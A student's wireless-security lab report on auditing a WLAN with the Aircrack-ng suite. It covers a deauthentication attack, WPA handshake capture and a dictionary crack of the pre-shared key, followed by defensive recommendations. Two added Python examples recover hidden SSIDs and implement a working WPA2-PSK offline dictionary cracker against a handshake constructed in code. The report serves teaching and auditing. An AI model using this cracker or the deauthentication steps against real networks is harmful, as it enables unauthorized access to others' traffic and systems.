Contents
Lab #18: Auditing a Wireless Network and Planning for a Secure WLAN Implementation
a. Assessment Sheet
b. Challenge Question
c. Screenshots
Lab #18: Auditing a Wireless Network and Planning for a Secure WLAN Implementation
a. Assessment Sheet
Course Name and Number: Foundations of Information Assurance – IA5010
Student Name: Carmen Alcivar
Instructor Name: Derek Brodeur
Lab Due Date: 3/20/16
Lab Assessment Questions & Answers
1. What functions do these WLAN applications and tools perform on WLANs: airmon-ng, airodump-ng, aircrack-ng, and aireplay-ng?
The airmon-ng tool puts a wireless LAN interface into monitor mode, in which it receives every 802.11 frame within radio range rather than only the frames addressed to it, and can switch it back to managed mode. Entering the airmon-ng command without parameters lists the wireless interfaces, their drivers and their current status.
The airodump-ng tool captures raw 802.11 frames to a file and lists the access points and clients it hears (BSSID, channel, encryption type, SSID). It is particularly suitable for collecting WEP initialization vectors and WPA/WPA2 four-way handshakes for later use with aircrack-ng.
The aireplay-ng tool injects frames. The primary purpose of the injection is to generate the traffic that aircrack-ng later uses to crack WEP and WPA-PSK keys. Its attacks include deauthentication (disconnecting a client so that its WPA handshake can be captured when it reconnects), fake authentication, interactive packet replay, handcrafted ARP request injection, and ARP-request reinjection.
The aircrack-ng tool is an 802.11 WEP and WPA-PSK key cracking program. It recovers WEP keys statistically once enough data packets (initialization vectors) have been captured, and recovers WPA-PSK keys by running a dictionary attack against a captured handshake.
2. Why is it critical to use encryption techniques on a wireless LAN? Which
encryption method is best for use on a WLAN (WEP, WPA, WPA2)?
WPA2 (AES-CCMP) is the best of the three. Encryption is critical on a wireless LAN because radio is a shared medium: anyone within range can passively capture every frame with a commodity card in monitor mode without ever connecting to the network, so unencrypted traffic, including logons and passwords, is exposed to anyone nearby. WEP can be broken in minutes once enough packets are collected and WPA (TKIP) was only an interim fix, so WPA2 is the method to use.
3. What security countermeasures can you enable on your wireless access point
(WAP) as part of a layered security solution for WLAN implementations?
- Enabling MAC address filtering on the WAPs, keeping in mind that MAC addresses are visible in every frame and can be spoofed, so this only stops casual connections.
- Disabling SSID broadcast, keeping in mind that the SSID can still be recovered from probe and association frames, so this is not a security control on its own.
- Limiting the pool of IP host addresses on the WLAN DHCP server to the number of expected clients, to make unauthorized DHCP leases harder to obtain.
- Enabling WPA2 (AES-CCMP) with a long, random pre-shared key to maximize encryption and ensure confidentiality of data transmission. WPA2-Enterprise uses additional IT infrastructure, such as a RADIUS server with IEEE 802.1X, to authenticate each user individually and protect against unauthorized access.
- Protecting data transmissions and e-mail over the WLAN with end-to-end encryption and message authentication (TLS or a VPN, which use keyed hashes or signatures rather than a plain hash) to ensure confidentiality and integrity even if the wireless layer is compromised.
4. Why is it so important for organizations, including homeowners, to properly secure their wireless network?
Radio does not stop at the walls of an office or a house, so an unsecured wireless network can be reached from the street or the parking lot without any physical access. It must be secured to prevent unauthorized access to the internal network and the systems on it, interception of the traffic it carries, and misuse of the Internet connection for activity that will be attributed to the owner.
5. What risks, threats, and vulnerabilities are prominent with WLAN
infrastructures?
Wireless connections have brought additional risks, threats and vulnerabilities. In the case of WLAN infrastructures, among them we can cite:
- An employee could plug a wireless access point into the network jack at his or her desk (a rogue access point) and allow an unauthorized user to access the network and, possibly, unauthorized systems.
- Some WLANs are implemented with no encryption, while others use only WEP (Wired Equivalent Privacy), which relies on RC4 with a weak key schedule and a short (40-bit or 104-bit) key and can be cracked with readily available tools once enough packets are captured.
- Users frequently share pre-shared keys to allow others access to the WLAN, and a weak pre-shared key can be recovered by a dictionary attack against a captured handshake.
- Access points broadcast their SSID (Service Set Identifier), the network's name, in clear text, and clients reveal the networks they are looking for in their probe requests. Without encryption (or a VPN on top of the WLAN), the traffic itself is also easily captured by readily available scanners.
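The SSID points above (disabling SSID broadcast in question 3, and the clear-text SSID item in question 5) are illustrated by the following added example; it is not part of the lab report or of the Aircrack-ng suite. It builds a few 802.11 management frames in code (made-up MAC addresses; the frames are constructed, not captured) and shows that a beacon with SSID broadcast disabled carries an empty SSID element, while the client's probe request, the access point's probe response and the association request all carry the name "Silentvalor" in clear text, so hiding the SSID only delays an attacker until the next client joins.

```python
# Added example (not part of the lab): how an SSID that is not broadcast is still
# recovered from other 802.11 management frames. All frames below are constructed
# in code for the demonstration; none were captured from the lab network.

MGMT_HDR_LEN = 24
SUBTYPES = {0: "association request", 4: "probe request", 5: "probe response", 8: "beacon"}
# Bytes of fixed fields that precede the tagged parameters in each management frame body
FIXED_LEN = {0: 4, 4: 0, 5: 12, 8: 12}
BROADCAST = b"\xff" * 6


def build_mgmt_frame(subtype: int, addr1: bytes, addr2: bytes, bssid: bytes, ssid: bytes) -> bytes:
    """Minimal management frame: header, zeroed fixed fields, SSID IE (tag 0) and a rates IE."""
    frame_control = bytes([subtype << 4, 0x00])        # type 0 (management), given subtype
    header = frame_control + b"\x00\x00" + addr1 + addr2 + bssid + b"\x00\x00"
    fixed = b"\x00" * FIXED_LEN[subtype]
    ssid_ie = bytes([0x00, len(ssid)]) + ssid          # a hidden network sends length 0 here
    rates_ie = bytes([0x01, 0x01, 0x82])               # supported rates: 1 Mbit/s (basic)
    return header + fixed + ssid_ie + rates_ie


def parse_ssid(frame: bytes):
    """Return {'subtype', 'bssid', 'ssid'} for the four frame kinds that carry an SSID IE, else None."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:                          # not a management frame
        return None
    subtype = fc0 >> 4
    if subtype not in SUBTYPES:
        return None
    bssid = frame[16:22]                               # address 3 is the BSSID in all four cases
    offset = MGMT_HDR_LEN + FIXED_LEN[subtype]
    ssid = None
    while offset + 2 <= len(frame):                    # walk the tagged parameters
        tag, length = frame[offset], frame[offset + 1]
        value = frame[offset + 2: offset + 2 + length]
        if tag == 0:
            # Hidden SSID: zero-length IE or all-NUL padding; anything else is the real name
            ssid = value.decode("utf-8", errors="replace") if value.strip(b"\x00") else None
            break
        offset += 2 + length
    return {"subtype": SUBTYPES[subtype], "bssid": bssid, "ssid": ssid}


def recover_ssids(frames):
    """Map BSSID -> SSID from whichever frame first names it, whether or not the beacon does."""
    learned = {}
    for frame in frames:
        info = parse_ssid(frame)
        if info and info["ssid"]:
            learned.setdefault(info["bssid"], info["ssid"])
    return learned


# Constructed sample: an AP with SSID broadcast disabled and one client joining it
AP_MAC = bytes.fromhex("00112233aabb")      # made-up address
STA_MAC = bytes.fromhex("66778899ccdd")     # made-up address
HIDDEN_BEACON = build_mgmt_frame(8, BROADCAST, AP_MAC, AP_MAC, b"")
PROBE_REQ = build_mgmt_frame(4, AP_MAC, STA_MAC, AP_MAC, b"Silentvalor")
PROBE_RESP = build_mgmt_frame(5, STA_MAC, AP_MAC, AP_MAC, b"Silentvalor")
ASSOC_REQ = build_mgmt_frame(0, AP_MAC, STA_MAC, AP_MAC, b"Silentvalor")
SAMPLE_CAPTURE = [HIDDEN_BEACON, PROBE_REQ, PROBE_RESP, ASSOC_REQ]

if __name__ == "__main__":
    print(parse_ssid(HIDDEN_BEACON))        # beacon alone: ssid is None
    print(recover_ssids(SAMPLE_CAPTURE))    # the client's frames reveal 'Silentvalor'
```

The same walk over the tagged parameters is what airodump-ng does when it fills in a previously hidden SSID as soon as a client probes for or associates with the network; this is why the answer to question 3 treats SSID hiding as an obscurity measure rather than a security control.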
6. What is the risk of logging onto access points in airports or other public
places?
An attacker can set up a rogue wireless access point (often with the same name as the legitimate free hotspot) to capture credentials and other data while an unsuspecting user connects to the Internet through it. Even on the legitimate hotspot, an open network has no encryption, so other users within range can capture the traffic.
7. Why is it important to have a wireless access policy and to conduct regular
site surveys and audits?
A wireless access policy defines which access points are authorized, how they must be configured (encryption, authentication, SSID, placement) and who may connect. Regular site surveys and audits verify that the deployed WLAN actually matches the policy and detect rogue or misconfigured access points. Improperly configured WLANs can provide unrestricted access to an organization's entire network environment.
8. What is a risk of using your mobile cell phone or external WLAN as a WiFi
connection point?
Using a mobile cell phone (tethering) or an external WLAN as a WiFi connection point poses great risks because the traffic bypasses the internal corporate security controls (firewall, web filtering, monitoring), and if the device is at the same time connected to the internal network it bridges the two and gives outsiders a path into the corporate network.
b. Challenge Question
As a field representative for your company, you are used to traveling and working from hotels on the road. You always stay in a hotel with free WiFi so that you can work and check your email, as well as Skype with your family. What are the risks of using a public WiFi?
Using public WiFi poses high risks to organizations and to individuals. Hotel networks are usually open or share one key among all guests, so anyone on the same network can capture traffic, a rogue access point can impersonate the hotel's network, and an attacker who compromises the laptop there can use it to bypass the internal corporate security solutions once it reconnects to the company network.
Short of finding a more secure network, what could you do to use this wireless network in a more secure fashion? What options do you have if you are traveling for personal reasons, and not as an employee?
Use the corporate VPN for all traffic as soon as the laptop connects, so that the hotel network only sees an encrypted tunnel; confirm the exact network name with the hotel to avoid a look-alike access point; use only HTTPS/TLS-protected services; keep the host firewall on, file sharing off and the system patched; and disable automatic reconnection to remembered networks. The same measures apply to individuals traveling for personal reasons, since they also want to protect their personal information: prefer a personal VPN or the cellular data connection over free networks, and check the security settings of any network before using it.
c. Screenshots:
Part 3:
[Deliverable Lab Step 4]: screen shot displaying the key found
It took 06 min and 23 secs to find the key “darkobsidian”; 128,728 keys were tested.
WLAN security implementation plan (Draft)
a. Summary of findings from the lab
The computer with IP address 172.30.0.19 was compromised because the WLAN it used relied on a weak WPA pre-shared key and carried logon information in clear text once the wireless encryption was defeated. The intruder used the Aircrack-ng suite to capture and manipulate the wireless traffic.
Airmon-ng was used to put the wireless interface into monitor mode, creating the mon0 monitor interface. No authentication to the network was needed for this: monitor mode passively receives every 802.11 frame within radio range, so the attacker could observe all wireless traffic and identify the weak point used to carry out the attack. This step bypassed any type of authentication in the network.
Airodump-ng (the capture tool of the Aircrack-ng suite) was then used to record the traffic; it listed the nearby networks and their clients in clear text, as can be seen in the screenshot below. The network listed as item number 18 was selected for the attack.
The attacker then ran a deauthentication attack with aireplay-ng, first injecting 5 deauthentication packets and then 10 more, 15 in total, which disconnected the client (a denial of service against it). The administrator's machine automatically reconnected and was forced to re-authenticate, and the WPA four-way handshake exchanged during that reconnection was captured; with the handshake in hand it was easy for the attacker to go on to obtain the credentials.
b. Critical risks, threats, and vulnerabilities on the WLAN
The WLAN was protected only by WPA with a pre-shared key that was a single dictionary word, which exposed it to the threat of an offline dictionary attack and, once the key was recovered, to interception of passwords and network information.
The Silentvalor WLAN was identified as the target; its SSID and clients were displayed in clear text in the airodump-ng listing. After capturing the handshake, the attacker ran aircrack-ng with a wordlist dictionary file against the capture file in order to crack the WPA key. This process took only a few minutes (6 minutes 23 seconds, 128,728 keys tested) to find the key.
Once the key was found, it was easy to join the WLAN and read the traffic it carried.
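The cracking step described above (and the aircrack-ng WPA-PSK function from question 1) comes down to repeating the WPA2 key derivation for every wordlist entry and checking each result against the captured handshake. The following is an added example, not part of the lab report or of aircrack-ng: it implements that derivation (PBKDF2 to the pairwise master key, PRF-512 to the pairwise transient key, HMAC-SHA1 for the EAPOL-Key MIC) and runs the dictionary attack against a handshake constructed in code. The MAC addresses, nonces and wordlist are made up for the example; the SSID "Silentvalor" and the key "darkobsidian" are the ones named in this report. The "password"/"IEEE" check in the test is the published IEEE 802.11i PBKDF2 test vector.

```python
# Added example (not part of the lab report): the WPA2-PSK key derivation that
# aircrack-ng has to repeat for every wordlist entry, and an offline dictionary
# attack against a captured 4-way handshake. The handshake below is constructed
# in code with made-up MAC addresses and nonces, not captured from the lab network.
import hashlib
import hmac

MIC_OFFSET = 81   # Key MIC field of an EAPOL-Key frame (4-byte 802.1X header + 77 bytes of fields)
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MAC addresses and both nonces, ordered as the standard requires."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP Key MIC: HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Minimal handshake message 2 (client -> AP): RSN descriptor, MIC flag set, no key data."""
    body = (b"\x02"                       # descriptor type: RSN (WPA2)
            + b"\x01\x0a"                 # key info: HMAC-SHA1 version, pairwise, MIC present
            + b"\x00\x00"                 # key length
            + b"\x00" * 7 + b"\x01"       # replay counter
            + snonce                      # 32-byte SNonce
            + b"\x00" * 16                # key IV
            + b"\x00" * 8                 # key RSC
            + b"\x00" * 8                 # key ID
            + mic                         # 16-byte MIC (zero while computing it)
            + b"\x00\x00")                # key data length (RSN IE omitted in this constructed frame)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X version 1, type EAPOL-Key


def make_handshake(passphrase: str, ssid: str, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """What a client holding the right passphrase sends: message 2 carrying a valid MIC."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Offline attack: derive PMK -> PTK -> KCK per candidate and compare the recomputed MIC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed handshake parameters (made up for this example)
SSID = "Silentvalor"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MSG2 = make_handshake("darkobsidian", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
# Constructed wordlist; the lab's real run tested 128,728 entries before reaching the key
WORDLIST = ["password", "letmein", "silentvalor", "obsidian", "darkobsidian", "Dark0bsidian!"]


def demo():
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, MSG2, WORDLIST)


if __name__ == "__main__":
    print("recovered key:", demo())
```

Two things the code makes visible that the report's figures only imply: the 4096-iteration PBKDF2 is the whole cost of each guess (which is why 128,728 guesses took several minutes rather than milliseconds), and the SSID is the salt, so a rainbow table for one network name is useless against another. Neither helps when the passphrase is a dictionary word; only a long random key, or WPA2-Enterprise with no shared key at all, removes the attack.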
c. Assessment of the overall security of this WLAN
This WLAN was vulnerable to exploitation because its WPA key was a weak dictionary word and because the logon information carried over it was not otherwise encrypted, so once the key was recovered the logon information was displayed in clear text.
d. Security recommendations
Use encryption on the wireless LAN for all data payload within IP packets, including logons, passwords and private data, because otherwise they are shown in clear text to intruders. As demonstrated above, protocol capture tools such as the Aircrack-ng suite can capture IP packets from unsecured WLANs and compromise systems by stealing logons and passwords along with private data elements.
Three encryption methods are available for use on a WLAN, each with a different level of strength:
1. WEP (Wired Equivalent Privacy) - RC4 with a 40-bit (or 104-bit) key and a broken key schedule; crackable in minutes and must not be used.
2. WPA (WiFi Protected Access) - TKIP, RC4 with 128-bit per-packet keys; an interim subset of IEEE 802.11i, now deprecated.
3. WPA2 (WiFi Protected Access 2) - AES-CCMP with 128-bit keys derived from a 256-bit pairwise master key; the full implementation of IEEE 802.11i. This is the best encryption method for use on a WLAN, but in pre-shared key mode it remains vulnerable to the offline dictionary attack demonstrated in this lab when the passphrase is a dictionary word, so the key must be long and random, or WPA2-Enterprise with 802.1X/RADIUS should be used so that no shared key exists.
In addition, logons and other sensitive data should be protected end to end (TLS, SSH or a VPN) so that they are not exposed even to someone who has joined the WLAN.
Also, according to NIST, attack monitoring and vulnerability monitoring of the WLAN are needed (Guidelines for Securing Wireless Local Area Networks,
http://csrc.nist.gov/publications/drafts/800-153/Draft-SP800-153.pdf).
SANS recommends stronger user authentication, such as user IDs and passwords combined with smart cards or security tokens; this will prevent unauthorized parties from accessing private networks.